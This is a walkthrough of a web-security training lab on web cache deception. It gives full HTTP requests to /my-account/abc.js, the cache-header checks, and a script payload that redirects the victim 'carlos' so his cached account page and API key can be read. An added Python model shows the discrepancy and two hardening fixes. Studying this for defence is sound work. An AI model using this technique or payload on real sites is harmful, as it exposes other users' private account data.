Lab: Exploiting path mapping for web cache deception
Identify a target endpoint
After starting the exercise, the blog should look like the screenshot. We click on the link “My account” and log in with the user name wiener and the password peter.

After entering the data, click on the “Log In” button.

After successfully logging in, we will see our API key.

Identify a path mapping discrepancy
We now switch to the Burp Proxy and open the “HTTP history” tab there. In the “HTTP history”, search for the request GET /my-account and send it to Burp Repeater.

To send the request to Burp Repeater, we move the mouse over the request and press the right mouse button. A context menu appears in which we select the option “Send to Repeater”.

We now switch to the Burp Repeater and append an arbitrary string to the path in the first line. The request could look like this.
GET /my-account/abc HTTP/2
Host: 0a5900c80475e20de1d5ee43008f0047.web-security-academy.net
Cookie: session=QiIwBFLdpoAB2n0T8npy7iFMsv5GLAz8
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
We now send this request to the application and see in the response that our API key is still present. This means that the origin server maps the path /my-account/abc back to /my-account.

Now we add a static file extension to our string. To do this, we use the extension .js for JavaScript files. The request could look like this.
GET /my-account/abc.js HTTP/2
Host: 0a5900c80475e20de1d5ee43008f0047.web-security-academy.net
Cookie: session=QiIwBFLdpoAB2n0T8npy7iFMsv5GLAz8
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Now we send the request to the application and observe that the response contains the header X-Cache: miss and the header Cache-Control: max-age=30. The X-Cache: miss header indicates that this response was not served from the cache. The Cache-Control: max-age=30 header suggests that the response, if cached, should be stored for 30 seconds.

If we now send this request to the application again within 30 seconds of the first transmission, the value of the header changes to X-Cache: hit. This shows that the response was served from the cache. From this we can conclude that the cache interprets the URL path as /my-account/abc.js and has a cache rule based on the static extension .js. We can use this payload for an exploit.
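The discrepancy described above, modelled as a small added example (not code from the lab or from PortSwigger): the origin maps everything under /my-account to the account page, while the shared cache decides cacheability from the file extension alone. The helper names (origin, Cache, demo) and the two hardening knobs (no-store on the user-specific response; a cache that checks the Content-Type against the extension) are assumptions for illustration.

```python
from dataclasses import dataclass
import posixpath

# Cache rule as observed in the lab: the URL extension alone decides cacheability.
STATIC_TYPES = {".js": "application/javascript", ".css": "text/css", ".png": "image/png"}

@dataclass
class Response:
    body: str
    headers: dict

def origin(path: str, user: str, hardened: bool) -> Response:
    """Origin path mapping seen in the lab: any path under /my-account is
    abstracted to the account page, whatever the trailing segment says."""
    if path == "/my-account" or path.startswith("/my-account/"):
        # Weak: the user-specific page carries max-age=30, as in the lab.
        # Hardened: no-store/private forbids any shared cache from keeping it.
        cc = "no-store, private" if hardened else "max-age=30"
        return Response(f"API key of {user}", {"Content-Type": "text/html", "Cache-Control": cc})
    return Response("not found", {"Content-Type": "text/html", "Cache-Control": "max-age=30"})

class Cache:
    """Shared cache keyed on the full URL path, with an extension-based rule."""
    def __init__(self, check_content_type: bool = False):
        self.store = {}
        self.check_content_type = check_content_type  # hardened-cache knob (assumed)

    def fetch(self, path: str, user: str, origin_hardened: bool = False):
        if path in self.store:
            return self.store[path], "hit"
        resp = origin(path, user, origin_hardened)
        ext = posixpath.splitext(path)[1]
        cacheable = ext in STATIC_TYPES and "no-store" not in resp.headers["Cache-Control"]
        # Hardened cache: the body must really be the static type the extension claims.
        if cacheable and self.check_content_type:
            cacheable = resp.headers["Content-Type"] == STATIC_TYPES[ext]
        if cacheable:
            self.store[path] = resp
        return resp, "miss"

def demo(path: str, origin_hardened: bool = False, cache_checks_type: bool = False):
    """carlos requests the path first, then wiener requests the same path.
    Returns wiener's X-Cache status and whether carlos's page was handed to him."""
    cache = Cache(check_content_type=cache_checks_type)
    cache.fetch(path, "carlos", origin_hardened)
    resp, status = cache.fetch(path, "wiener", origin_hardened)
    return status, "carlos" in resp.body
```

demo("/my-account/abc.js") returns ('hit', True) for the weak setup, while the same path with either hardening knob set, or the extension-less /my-account/abc, returns ('miss', False).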
Craft an exploit
We now switch to the exploit server. To do this, we click on the “Go to exploit server” button in the browser.

In the Exploit Server, we add an exploit in the “Body” section that redirects the user carlos to the URL that we created above.

The exploit looks as follows.
<script>document.location="https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/my-account/abc.js"</script>
The address must be adapted to your own lab instance. document.location is a Location object in JavaScript, to which we assign the address of our lab environment. You can find more information at Mozilla Dev. By clicking on the “Deliver exploit to victim” button, we make the exploit available to our victim. When the victim follows the exploit, the response it receives is stored in the cache.

After we have delivered the exploit to our victim, we take the address from the exploit, https://0a5900c80475e20de1d5ee43008f0047.web-security-academy.net/my-account/abc.js, and paste it into a new tab in our browser. We now see the account of carlos.

We now copy the API key and click on the “Submit solution” button.

In the window that appears, we enter the API key of carlos.

After confirming the entry by clicking on “Ok”, we have completed the exercise.
